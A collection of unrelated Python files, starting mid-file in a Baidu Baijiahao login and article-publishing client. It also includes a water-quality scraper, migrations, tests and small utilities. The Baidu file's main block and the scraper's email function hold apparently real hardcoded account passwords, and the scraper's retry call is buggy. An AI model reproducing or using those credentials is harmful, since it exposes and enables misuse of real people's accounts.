'apiver': 'v3',
'tt': int(time.time() * 1000),
'gid': gid,
'callback': callback,
'loginversion': 'v4',
'traceid': traceid
}
resp = session.get(url='https://passport.baidu.com/v2/getpublickey', params=get_data)
if resp.status_code == 200 and callback in resp.text:
data = json.loads(re.search(r'.*?\((.*)\)', resp.text).group(1).replace("'", '"'))
return data.get('pubkey'), data.get('key')
else:
print('获取rsa key失败')
return None
@staticmethod
def _get_runntime():
"""
:param path: 加密js的路径,注意js中不要使用中文!估计是pyexecjs处理中文还有一些问题
:return: 编译后的js环境,不清楚pyexecjs这个库的用法的请在github上查看相关文档
"""
phantom = execjs.get() # 这里必须为phantomjs设置环境变量,否则可以写phantomjs的具体路径
source = toutiao_login_js.baidu_login_js
return phantom.compile(source)
def publish(self, title, content, category, flag=1):
"""
:param title:
:param content:
:param category:
:return: status, cause
"""
try:
status = 3
cause = ''
self.logger.info("account: %s title:%s " % (self.account.account, title))
result = re.compile(r'<img.*?src="(.*?)".*?>', re.S).findall(content) # 查找p标签
if not result:
cause = '请上传文章封面'
self.logger.error(cause)
return status, cause
for img in result:
con_img = img.replace("&", "&")
content = content.replace(img, con_img)
cover = result[0]
# 上传
self.session.post(
'https://baijiahao.baidu.com/builder/author/article/articleDiagnose',
data={
'content': content,
'type': 'news'
}, )
self.session.post(
'https://baijiahao.baidu.com/builder/author/article/titleRecommend',
data={
'title': title,
'content': 'content',
'feed_cat': self.feed_cat[category]
}
)
data = {
'title': title,
'content': content,
'feed_cat': '11',
'len': len(content),
'original_status': '0',
'source_reprinted_allow': '2',
'cover_auto_images': '[{"src":"%s","width":476,"height":340,"is_suitable":true}]' % cover,
'spd_info': '{"goods_info":[]}',
'cover_layout': 'auto',
'cover_images': '[]',
'_cover_images_map': '[]',
'type': 'news',
'isBeautify': 'false',
'announce_id': 0,
'subtitle': ''
}
# if flag == 3:
# del data['cover_auto_images']
# data['cover_layout'] = 'three'
# cover_images = []
# for img in result[:3]:
# cover_images.append({"src": "{}".format(img), "cropData":
# {"x": 10, "y": 0, "width": 507, "height": 340}})
# data['cover_layout'] = cover_images
self.session.get('https://ttl-bjh.baidu.com/cms/statistics/statistics/img/s.gif?op_time={}'
'&client_type=pc&app_id=1536772421402989&'
'page_url=https%3A%2F%2Fbaijiahao.baidu.com%2Fbuilder%2Frc%2Fedit%3Ftype%3Dnews%26'
'app_id%3D1536772421402989&refer=https%3A%2F%2Fbaijiahao.baidu.com%2Fbuilder%2Fauthor%2'
'Fregister%2Findex&urlkey=custom-%E5%8F%91%E6%96%87%E6%93%8D%E4%BD%9C-%E6%96%B0%E7%'
'89%88%E6%8E%A5%E5%8F%A3&bjh_param=%7B%22type%22%3A%22news%22%2C%22articleId%22%3Anull%7D'
.format(int(time.time() * 1000)))
resp = self.session.post(
'https://baijiahao.baidu.com/builder/author/article/publish',
data=data,
).json()
self.logger.info(resp)
if resp['errno'] == 0:
status = 2
cause = ''
return status, cause
elif '频繁' in resp['errmsg']:
return 1, ''
else:
cause = resp['errmsg']
return 3, cause
except Exception as e:
self.logger.error('发文失败,检查账号可用性', e)
raise CustomException('百家发文失败,检查账号:%s' % self.account.account)
def read_count(self,
start_day=datetime.datetime.now() - datetime.timedelta(days=int(7)),
end_day=datetime.datetime.now() - datetime.timedelta(days=int(1))):
self.logger.info("account: %s" % self.account.account)
res = self.session.get(
"https://baijiahao.baidu.com/builder/app/appinfo").json()
if res['errno'] != 0:
raise CustomException(res['errmsg'])
username = res['data']['user']['name']
res = self.session.post(
"https://baijiahao.baidu.com/builder/author/statistic/appStatistic",
data={
"type": "news",
"is_yesterday": "false",
"start_day": start_day.strftime("%Y%m%d"),
"end_day": end_day.strftime("%Y%m%d"),
"stat": "0"}).json()
read_list = []
for data in res['data']['list']:
if int(data['recommend_count']) == -1:
continue
readcount = {
"day_time": time.strftime('%Y-%m-%d', time.strptime(data['event_day'], "%Y%m%d")),
"user_name": username,
"like_num": data.get("likes_count", 0),
"recomment_num": data.get("recommend_count", 0),
"read_num": data.get("view_count", 0),
"comment_num": data.get("comment_count", 0),
"share_num": data.get("share_count", 0),
"collect_num": data.get("collect_count", 0)
}
read_list.append(readcount)
# logging.info(readcount)
return read_list
def fetch_article_status(self, title):
url = ''
re_a = re.compile('<[a-zA-Z\/!].*?>', re.S)
resp = self.session.get(
'https://baijiahao.baidu.com/builder/article/lists?type=&collection=&pageSize=10¤tPage=1&search='
).json()
if resp['errno'] != 0:
raise CustomException('账号异常')
articles = resp['data']['list']
res = [2, '没查询到该文章', url]
for art in articles:
if title != art['title']:
continue
if art['status'] == 'rejected':
url = art['url']
res = 5, re_a.sub('', art['audit_msg']).replace(' ', ''), url
elif art['status'] == 'publish':
url = art['url']
res = 4, '', url
return res
def upload_image(self, image_name, image_data):
resp = self.session.post(
'https://baijiahao.baidu.com/builderinner/api/content/file/upload',
files={
'media': (image_name, image_data, 'image/jpeg', {
'is_waterlog': '1', 'save_material': '1',
'type': 'image', "no_compress": '0',
'app_id': '1594805746441778',
})}
).json()
if resp['error_code'] != 0:
raise CustomException('上传失败')
return resp['ret']['no_waterlog_bos_url']
def check_user_cookies(self):
self.logger.info('')
try:
res = self.session.get(
"https://baijiahao.baidu.com/builder/app/appinfo").json()
if not res['errno']:
return True
except Exception as e:
self.logger.error(e)
return False
def query_article_data(self, title):
"""获取单篇文章阅读"""
resp = self.session.get(
'https://baijiahao.baidu.com/builder/article/lists?type=&collection=&pageSize=10¤tPage=1&search='
).json()
if resp['errno'] != 0:
raise CustomException(resp['errmsg'])
arts = resp['data']['list']
for art in arts:
if title != art['title']:
continue
else:
data = dict(
read_num=art['read_amount'],
recomment_num=art['rec_amount'],
comment_num=int(art['comment_amount']),
share_num=art['share_amount'],
like_num=int(art['like_amount']),
collect_num=art['collection_amount'],
publish_time=art['updated_at'],
follow_num=-1
)
return data
return ''
def query_account_message(self):
return []
if __name__ == '__main__':
ss = BaiJia.login('13522068263', 'JINGmeiti123')
print(ss)
|
#!/usr/bin/env python3
# xlattice_py/testTimestamp.py
""" Test timestamp-related functions. """
import calendar
import os
import time
import unittest
from xlutil import(mk_epoch_from_utc, get_utc_timestamp,
parse_timestamp, timestamp, timestamp_now)
from rnglib import SimpleRNG
class TestTimestamp(unittest.TestCase):
""" Test timestamp-related functions. """
def setUp(self):
self.rng = SimpleRNG(time.time())
def tearDown(self):
pass
# Note that in the Go code timestamp is an int64, whereas here it
# is a string.
def test_constructor(self):
""" Verify that successive timestamps are about the same. """
struct_now = time.gmtime() # struct_time
gmt_now = calendar.timegm(struct_now) # seconds from epoch
str_now = timestamp(gmt_now)
now_again = parse_timestamp(str_now)
str_again = timestamp(now_again)
self.assertEqual(str_now, str_again)
def test_parser(self):
""" Exercise the timestamp parser. """
example = "2004-11-18 20:03:34"
from_epoch = parse_timestamp(example) # seconds from epoch
from_as_str = timestamp(from_epoch)
self.assertEqual(from_as_str, example)
def test_now(self):
""" Verify that timestamp_now() returns the GMT time. """
struct_now = time.gmtime() # struct_time
gmt_now = calendar.timegm(struct_now) # seconds from epoch
now_as_str = timestamp_now() # in string format
now2 = parse_timestamp(now_as_str)
self.assertTrue(now2 - gmt_now <= 1)
def test_epoch_converter(self):
# using code should set this:
os.environ['TZ'] = 'UTC'
t__ = time.time()
tstamp = get_utc_timestamp() # UTC
s__ = mk_epoch_from_utc(tstamp)
if t__ > s__:
delta_t = t__ - s__
else:
delta_t = s__ - t__
self.assertTrue(delta_t <= 1)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.2.11 on 2022-02-28 14:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Notification',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('notification_type', models.CharField(choices=[('user_action', 'User Action'), ('info', 'Info'), ('recommend', 'Recommend')], default='user_action', max_length=20)),
('sender_object_id', models.PositiveIntegerField()),
('description', models.CharField(max_length=255)),
('is_read', models.BooleanField(db_index=True, default=False)),
('url', models.URLField(blank=True, null=True)),
('recipient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notifications', to=settings.AUTH_USER_MODEL)),
('sender_content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notify_sender', to='contenttypes.contenttype')),
],
options={
'ordering': ('-created',),
'index_together': {('recipient', 'is_read')},
},
),
]
|
"""Copyright (c) 2021, Nadun De Silva. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from apis import clients
import telemetry
from . import pets, customers, orders
logger = telemetry.get_logger(__name__)
tracer = telemetry.get_tracer(__name__)
def generate_data() -> None:
with tracer.start_as_current_span("generate data") as span:
with clients.pet_store_api_client_context() as client:
logger.info("Generating sample data started")
created_pets = pets.generate(client)
span.set_attribute("gen.pets_count", len(created_pets))
created_customers = customers.generate(client)
span.set_attribute("gen.customers_count", len(created_customers))
created_orders = orders.generate(client, created_customers, created_pets)
span.set_attribute("gen.orders_count", len(created_orders))
logger.info("Generating sample data completed")
|
import os
import numpy as np
from libcity.data.dataset import TrafficStateCPTDataset, TrafficStateGridDataset
from libcity.utils.dataset import timestamp2array, timestamp2vec_origin
class STResNetDataset(TrafficStateGridDataset, TrafficStateCPTDataset):
"""
STResNet外部数据源代码只用了ext_y, 没有用到ext_x!
"""
def __init__(self, config):
super().__init__(config)
self.external_time = self.config.get('external_time', True)
self.parameters_str = \
self.parameters_str + '_' + str(self.len_closeness) \
+ '_' + str(self.len_period) + '_' + str(self.len_trend) \
+ '_' + str(self.interval_period) + '_' + str(self.interval_trend)
self.cache_file_name = os.path.join('./libcity/cache/dataset_cache/',
'grid_based_{}.npz'.format(self.parameters_str))
self.pad_forward_period = 0
self.pad_back_period = 0
self.pad_forward_trend = 0
self.pad_back_trend = 0
def _get_external_array(self, timestamp_list, ext_data=None, previous_ext=False, ext_time=True):
"""
根据时间戳数组,获取对应时间的外部特征
Args:
timestamp_list: 时间戳序列
ext_data: 外部数据
previous_ext: 是否是用过去时间段的外部数据,因为对于预测的时间段Y,
一般没有真实的外部数据,所以用前一个时刻的数据,**多步预测则用提前多步的数据**
Returns:
np.ndarray: External data shape is (len(timestamp_list), ext_dim)
"""
data = []
if ext_time:
vecs_timestamp = timestamp2array(
timestamp_list, 24 * 60 * 60 // self.time_intervals) # len(timestamp_list) * dim
else:
vecs_timestamp = timestamp2vec_origin(timestamp_list) # len(timestamp_list) * dim
data.append(vecs_timestamp)
# 外部数据集
if ext_data is not None:
indexs = []
for ts in timestamp_list:
if previous_ext:
# TODO: 多步预测这里需要改
ts_index = self.idx_of_ext_timesolts[ts - self.offset_frame]
else:
ts_index = self.idx_of_ext_timesolts[ts]
indexs.append(ts_index)
select_data = ext_data[indexs] # len(timestamp_list) * ext_dim 选出所需要的时间步的数据
data.append(select_data)
if len(data) > 0:
data = np.hstack(data)
else:
data = np.zeros((len(timestamp_list), 0))
return data # (len(timestamp_list), ext_dim)
def _load_ext_data(self, ts_x, ts_y):
"""
加载对应时间的外部数据(.ext)
Args:
ts_x: 输入数据X对应的时间戳,shape: (num_samples, T_c+T_p+T_t)
ts_y: 输出数据Y对应的时间戳,shape:(num_samples, )
Returns:
tuple: tuple contains:
ext_x(np.ndarray): 对应时间的外部数据, shape: (num_samples, T_c+T_p+T_t, ext_dim),
ext_y(np.ndarray): 对应时间的外部数据, shape: (num_samples, ext_dim)
"""
# 加载外部数据
if self.load_external and os.path.exists(self.data_path + self.ext_file + '.ext'): # 外部数据集
ext_data = self._load_ext()
ext_data = 1. * (ext_data - ext_data.min()) / (ext_data.max() - ext_data.min())
else:
ext_data = None
ext_x = []
for ts in ts_x:
ext_x.append(self._get_external_array(ts, ext_data, ext_time=self.external_time))
ext_x = np.asarray(ext_x)
# ext_x: (num_samples_plus, T_c+T_p+T_t, ext_dim)
ext_y = self._get_external_array(ts_y, ext_data, previous_ext=True, ext_time=self.external_time)
# ext_y: (num_samples_plus, ext_dim)
return ext_x, ext_y
def get_data_feature(self):
"""
返回数据集特征,scaler是归一化方法,adj_mx是邻接矩阵,num_nodes是网格的个数,
len_row是网格的行数,len_column是网格的列数,
feature_dim是输入数据的维度,output_dim是模型输出的维度
Returns:
dict: 包含数据集的相关特征的字典
"""
lp = self.len_period * (self.pad_forward_period + self.pad_back_period + 1)
lt = self.len_trend * (self.pad_forward_trend + self.pad_back_trend + 1)
return {"scaler": self.scaler, "adj_mx": self.adj_mx,
"num_nodes": self.num_nodes, "feature_dim": self.feature_dim, "ext_dim": self.ext_dim,
"output_dim": self.output_dim, "len_row": self.len_row, "len_column": self.len_column,
"len_closeness": self.len_closeness, "len_period": lp, "len_trend": lt, "num_batches": self.num_batches}
|
from random import *
def rockPaperScissors(user,npc):
if user == 1 and npc == 1:
print("Tie")
elif user == 1 and npc == 2:
print("NPC Wins")
elif user == 1 and npc == 3:
print("User Wins!")
elif user == 2 and npc == 1:
print("User Wins")
elif user == 2 and npc == 2:
print("Tie")
elif user == 2 and npc == 3:
print("NPC Wins")
elif user == 3 and npc == 1:
print("NPC Wins")
elif user == 3 and npc == 2:
print("User Wins")
else:
print("Tie")
userIn = ""
print("Welcome to RPS!")
userIn = input("Enter Rock, Paper, Scissors, or Quit: ")
if userIn.lower() == "rock":
rInt = randint(1,3)
print(rInt)
rockPaperScissors(1, rInt)
elif userIn.lower() == "paper":
rInt = randint(1,3)
# RPS(2,rInt)
elif userIn.lower() == "scissors":
rInt = randint(1,3)
# RPS(3,rInt)
else:
print("Invalid Entry!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Filter for escaping unsafe XML characters: <, >, &
@author Sergey Chikuyonok (serge.che@gmail.com)
@link http://chikuyonok.ru
'''
import re
alias = 'e'
"Filter name alias (if not defined, ZC will use module name)"
char_map = {
'<': '<',
'>': '>',
'&': '&'
}
re_chars = re.compile(r'[<>&]')
def escape_chars(text):
return re_chars.sub(lambda m: char_map[m.group(0)], text)
def process(tree, profile=None):
for item in tree.children:
item.start = escape_chars(item.start)
item.end = escape_chars(item.end)
process(item)
return tree
|
#!/usr/bin/env python3
import shutil
import sys
import os
import ntpath
targetFiles = ["source/au/audiounitconfig.h", "source/au/Info.plist", "resource/llllpluginnamellll.rc", "source/version.h",
"source/pluginProcessor.cpp", "source/pluginProcessor.h", "source/pluginController.cpp", "source/pluginController.h",
"source/factoryDefinition.cpp", "CMakeLists.txt"]
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def replaceInFile(searchText, replaceText, filePath):
if os.path.exists(filePath):
# search and replace, creating temp file
input = open(filePath)
inputStr = input.read()
input.close()
if inputStr.count(searchText) > 0:
output = open(filePath, 'w')
output.write(inputStr.replace(searchText, replaceText))
output.close()
print (" replaced", searchText, "with", replaceText, "in", path_leaf(filePath))
else:
print(filePath, " not found.")
return
def replaceAttrInFiles(attr, value):
cwd = os.getcwd()
validAttr = True
searchText = ''
searchTextLowercase = ''
if(attr == 'name'):
searchText = 'llllPluginNamellll'
searchTextLowercase = 'llllpluginnamellll'
elif(attr == 'company'):
searchText = 'llllCompanyllll'
searchTextLowercase = 'llllcompanyllll'
elif(attr == 'subtype'):
searchText = 'lxxl'
elif(attr == 'mfgr'):
searchText = 'LXXL'
elif(attr == 'url'):
searchText = 'llllCompanyURLllll'
elif(attr == 'email'):
searchText = 'lllllCompanyEmailllll'
elif(attr == 'uida'):
searchText = '0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA'
elif(attr == 'uidb'):
searchText = '0xBBBBBBBB, 0xBBBBBBBB, 0xBBBBBBBB, 0xBBBBBBBB'
else:
validAttr = False
replaceText = value
replaceTextLowercase = str.lower(replaceText)
# search and replace the template attribute in all the target files.
# not all strings we want to replace will be in all the files,
# but for simplicity we just grind through all the files for each search anyway.
if(validAttr):
for file in targetFiles:
fullName = cwd + "/" + file
replaceInFile(searchText, replaceText, fullName)
if searchTextLowercase != '':
replaceInFile(searchTextLowercase, replaceTextLowercase, fullName)
return
# allow running from cmd line
if __name__ == "__main__":
# count the arguments
arguments = len(sys.argv) - 1
if arguments != 2:
print("usage: setPluginInfo <attribute> <stringValue>")
quit()
replaceAttrInFiles(sys.argv[1], sys.argv[2])
|
#!/usr/bin/python3
'''
print following Pattern
1
22
333
4444
if input = 5
'''
#code
for i in range(1, int(input())):
print ((10**(i)//9)*i)
|
# -*- coding: utf-8 -*-
# @Time : 2019/4/23 14:01
# @Author : hyy
# @Email : 1554148540@qq.com
# @File : water_quality_data.py
# @Software: PyCharm
import requests
import time
import os
import random
import smtplib
from email.mime.text import MIMEText
from email.header import Header
def get_data(url, value, num_retries = 2):
try:
req = requests.post(url, data=value, headers=headers)
data = req.json()
except Exception as e:
print('下载出了点问题:', req.status_code)
if num_retries > 0:
if 500 <= req.status_code < 600:
time.sleep(10)
return get_data(url, num_retries-1)
return data
def email_send(text, time):
sender = ' 3140105713@zju.edu.cn'
receivers = ['1554148540@qq.com'] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱
mail_host = "smtp.zju.edu.cn" # 设置服务器
mail_user = "3140105713@zju.edu.cn" # 用户名
mail_pass = "5896westwood" # 口令
# 三个参数:第一个为文本内容,第二个 plain 设置文本格式,第三个 utf-8 设置编码
message = MIMEText(text, 'plain', 'utf-8')
message['From'] = Header("水质数据", 'utf-8') # 发送者
message['To'] = Header("hyy", 'utf-8') # 接收者
subject = '水质数据获取情况' + time
message['Subject'] = Header(subject, 'utf-8')
try:
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host, 25) # 25 为 SMTP 端口号
smtpObj.login(mail_user, mail_pass)
smtpObj.sendmail(sender, receivers, message.as_string())
print("邮件发送成功")
except smtplib.SMTPException:
print("Error: 无法发送邮件")
if __name__ == '__main__':
path1 = os.path.abspath('.') # 获取当前脚本所在的路径
folder = os.path.exists(path1 + '\\水质数据')
if not folder:
os.makedirs(path1 + '\\水质数据')
print('爬虫开始运行')
headers = {
'Host': '123.127.175.45:8082',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Referer': 'http://123.127.175.45:8082/',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '21',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
value = {
'Method': 'SelectRealData'
}
url = 'http://123.127.175.45:8082/ajax/GwtWaterHandler.ashx'
# url = 'http://www.baidu.com'
data_ex = requests.post(url, data=value, headers=headers).json()
for item in data_ex:
with open(path1+ '\\水质数据\\' + item['siteName'] + '.txt', 'w', encoding='utf-8') as f:
f.write('时间 PH 溶解氧DO 氨氮NH4 高锰酸盐指数 总有机碳 水质类别 '
'断面属性 站点情况 \n')
f.write('{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{} \n'.format(item['dateTime'], item['pH'],
item['DO'], item['NH4'], item['CODMn'],
item['TOC'], item['level'], item['attribute'], item['status']))
print('初始数据爬取完成')
flag = 1
while True:
print('sleep now')
time.sleep(random.uniform(1,8*60*60))
data = get_data(url, value)
for i in range(len(data)):
if data[i]['dateTime'] == data_ex[i]['dateTime']:
continue
else:
item = data[i]
with open(path1 + '\\水质数据\\' + item['siteName'] + '.txt', 'a', encoding='utf-8') as f:
f.write('{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{} \n'.format(item['dateTime'], item['pH'],
item['DO'], item['NH4'], item['CODMn'],
item['TOC'], item['level'],
item['attribute'], item['status']))
data_ex = data
if flag % 10 == 1:
run_stage = '爬取时间:{}'.format(data[0]['dateTime'])
email_send(run_stage, data[0]['dateTime'])
print('此时间爬取完成:', end='')
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
flag += 1
|
from datetime import datetime
def convert_dt(year: int, month: int, day: int) -> str:
return datetime(year, month, day).strftime('%Y-%m-%d %H:%M:%S')
|
import csv
import os
# csv文件路径
path = './csv/'
# 定义数据清洗函数data_wash, 接收filename[文件名], la_max[最大纬度], ln_max[最大精度]参数,
def data_wash(filename, la_max, ln_max):
# 定义csv文件和写入器,用于保存生成的csv文件,保存的文件名为:原文件文件名+_output
csv_out_file = open(path + filename + '_output', 'w')
csv_writer = csv.writer(csv_out_file)
# 打开要处理文件
with open(path + filename, 'r') as csv_file:
csv_reader = csv.reader(csv_file)
line_count = 0
# 获取csv行数
for line in csv_reader:
line_count += 1
print('文件:{} 共有 {} 行'.format(filename, line_count))
if line_count < 50: # 小于50行数据的文件删除
print('文件少于 50行数据,删除...')
os.remove(path + filename)
with open(path + filename, 'r') as csv_file:
csv_reader2 = csv.reader(csv_file)
# 读取每行csv数据
for item in csv_reader2:
# 因为读出来的都是string类型的数据,要转换成float类型比较大小,这里使用try捕获异常,防止文件内容异常转换失败导致程序终止
try:
# 每行第一个数据(纬度)大于la_max的,或每行第二个数据(经度)大于ln_max的打印提示
if float(item[0]) > la_max or float(item[1]) > ln_max:
print('这条数据:{} 超出经纬范围'.format(item))
else: # 不大于的保存到新csv文件中
csv_writer.writerow(item)
except BaseException as e:
print('文件数据内容异常不符合规范(纬度,经度,其他字段,....),或磁盘已满')
print(e)
# 获取目录下的文件列表
file_list = os.listdir(path)
print('.csv目录下文件列表:{}'.format(file_list))
# 遍历每个文件调用data_wash函数进行处理
for file in file_list:
print('正处理文件:{}'.format(file))
data_wash(file, 41, 117)
|
"""empty message
Revision ID: d55a3395296c
Revises: 19d023a4f56c
Create Date: 2017-03-16 15:24:42.688425
"""
# revision identifiers, used by Alembic.
revision = 'd55a3395296c'
down_revision = '19d023a4f56c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('addresses',
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('postal_address', sa.String(length=255), nullable=True),
sa.Column('zip', sa.String(length=25), nullable=True),
sa.Column('country', sa.String(length=50), nullable=True),
sa.Column('comment', sa.String(length=250), nullable=True),
sa.Column('deleted', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('addresses')
### end Alembic commands ###
|
from __future__ import print_function
import os
import ast
import json
import demisto_client
from threading import Thread, Lock
from demisto_sdk.commands.common.tools import print_color, LOG_COLORS, run_threads_list, print_error
from Tests.Marketplace.marketplace_services import PACKS_FULL_PATH, IGNORED_FILES
PACK_METADATA_FILE = 'pack_metadata.json'
SUCCESS_FLAG = True
def get_pack_display_name(pack_id):
metadata_path = os.path.join(PACKS_FULL_PATH, pack_id, PACK_METADATA_FILE)
if pack_id and os.path.isfile(metadata_path):
with open(metadata_path, 'r') as json_file:
pack_metadata = json.load(json_file)
return pack_metadata.get('name')
return ''
def get_pack_data_from_results(search_results, pack_display_name):
if not search_results:
return {}
for pack in search_results:
if pack.get('name') == pack_display_name:
return {
'id': pack.get('id'),
'version': pack.get('currentVersion')
}
return {}
def create_dependencies_data_structure(response_data, dependants_ids, dependencies_data, checked_packs):
""" Recursively creates the packs' dependencies data structure for the installation requests
(only required and uninstalled).
Args:
response_data (dict): The GET /search/dependencies response data.
dependants_ids (list): A list of the dependant packs IDs.
dependencies_data (list): The dependencies data structure to be created.
checked_packs (list): Required dependants that were already found.
"""
next_call_dependants_ids = []
for dependency in response_data:
dependants = dependency.get('dependants', {})
for dependant in dependants.keys():
is_required = dependants[dependant].get('level', '') == 'required'
if dependant in dependants_ids and is_required and dependency.get('id') not in checked_packs:
dependencies_data.append({
'id': dependency.get('id'),
'version': dependency.get('extras', {}).get('pack', {}).get('currentVersion')
})
next_call_dependants_ids.append(dependency.get('id'))
checked_packs.append(dependency.get('id'))
if next_call_dependants_ids:
create_dependencies_data_structure(response_data, next_call_dependants_ids, dependencies_data, checked_packs)
def get_pack_dependencies(client, prints_manager, pack_data, thread_index, lock):
""" Get the pack's required dependencies.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): A prints manager object.
pack_data (dict): Contains the pack ID and version.
thread_index (int): the thread index.
lock (Lock): A lock object.
Returns:
(list) The pack's dependencies.
"""
pack_id = pack_data['id']
try:
response_data, status_code, _ = demisto_client.generic_request_func(
client,
path='/contentpacks/marketplace/search/dependencies',
method='POST',
body=[pack_data],
accept='application/json',
_request_timeout=None
)
if 200 <= status_code < 300:
dependencies_data = []
dependants_ids = [pack_id]
reseponse_data = ast.literal_eval(response_data).get('dependencies', [])
create_dependencies_data_structure(reseponse_data, dependants_ids, dependencies_data, dependants_ids)
dependencies_str = ', '.join([dep['id'] for dep in dependencies_data])
if dependencies_data:
message = 'Found the following dependencies for pack {}:\n{}\n'.format(pack_id, dependencies_str)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
return dependencies_data
else:
result_object = ast.literal_eval(response_data)
msg = result_object.get('message', '')
err_msg = 'Failed to get pack {} dependencies - with status code {}\n{}\n'.format(pack_id, status_code, msg)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to get pack {} dependencies has failed. Reason:\n{}\n'.format(pack_id, str(e))
prints_manager.add_print_job(err_msg, print_color, thread_index, LOG_COLORS.RED)
prints_manager.execute_thread_prints(thread_index)
lock.acquire()
global SUCCESS_FLAG
SUCCESS_FLAG = False
lock.release()
def search_pack(client, prints_manager, pack_display_name, thread_index, lock):
""" Make a pack search request.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): Print manager object.
pack_display_name (string): The pack display name.
thread_index (int): the thread index.
lock (Lock): A lock object.
Returns:
(dict): Returns the pack data if found, or empty dict otherwise.
"""
try:
# make the search request
response_data, status_code, _ = demisto_client.generic_request_func(client,
path='/contentpacks/marketplace/search',
method='POST',
body={"packsQuery": pack_display_name},
accept='application/json',
_request_timeout=None)
if 200 <= status_code < 300:
result_object = ast.literal_eval(response_data)
search_results = result_object.get('packs', [])
pack_data = get_pack_data_from_results(search_results, pack_display_name)
if pack_data:
print_msg = 'Found pack {} in bucket!\n'.format(pack_display_name)
prints_manager.add_print_job(print_msg, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
return pack_data
else:
print_msg = 'Did not find pack {} in bucket.\n'.format(pack_display_name)
prints_manager.add_print_job(print_msg, print_color, thread_index, LOG_COLORS.RED)
prints_manager.execute_thread_prints(thread_index)
raise Exception(print_msg)
else:
result_object = ast.literal_eval(response_data)
msg = result_object.get('message', '')
err_msg = 'Pack {} search request failed - with status code {}\n{}'.format(pack_display_name,
status_code, msg)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to search pack {} has failed. Reason:\n{}'.format(pack_display_name, str(e))
prints_manager.add_print_job(err_msg, print_color, thread_index, LOG_COLORS.RED)
lock.acquire()
global SUCCESS_FLAG
SUCCESS_FLAG = False
lock.release()
def install_packs(client, host, prints_manager, thread_index, packs_to_install, request_timeout=999999):
""" Make a packs installation request.
Args:
client (demisto_client): The configured client to use.
host (str): The server URL.
prints_manager (ParallelPrintsManager): Print manager object.
thread_index (int): the thread index.
packs_to_install (list): A list of the packs to install.
request_timeout (int): Timeout settings for the installation request.
"""
request_data = {
'packs': packs_to_install,
'ignoreWarnings': True
}
packs_to_install_str = ', '.join([pack['id'] for pack in packs_to_install])
message = 'Installing the following packs in server {}:\n{}'.format(host, packs_to_install_str)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN, include_timestamp=True)
prints_manager.execute_thread_prints(thread_index)
# make the pack installation request
try:
response_data, status_code, _ = demisto_client.generic_request_func(client,
path='/contentpacks/marketplace/install',
method='POST',
body=request_data,
accept='application/json',
_request_timeout=request_timeout)
if 200 <= status_code < 300:
message = 'Packs were successfully installed!\n'
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN, include_timestamp=True)
else:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
err_msg = f'Failed to install packs - with status code {status_code}\n{message}\n'
prints_manager.add_print_job(err_msg, print_error, thread_index, include_timestamp=True)
raise Exception(err_msg)
except Exception as e:
err_msg = f'The request to install packs has failed. Reason:\n{str(e)}\n'
prints_manager.add_print_job(err_msg, print_error, thread_index, include_timestamp=True)
global SUCCESS_FLAG
SUCCESS_FLAG = False
finally:
prints_manager.execute_thread_prints(thread_index)
def search_pack_and_its_dependencies(client, prints_manager, pack_id, packs_to_install,
installation_request_body, thread_index, lock):
""" Searches for the pack of the specified file path, as well as its dependencies,
and updates the list of packs to be installed accordingly.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): A prints manager object.
pack_id (str): The id of the pack to be installed.
packs_to_install (list) A list of the packs to be installed in this iteration.
installation_request_body (list): A list of packs to be installed, in the request format.
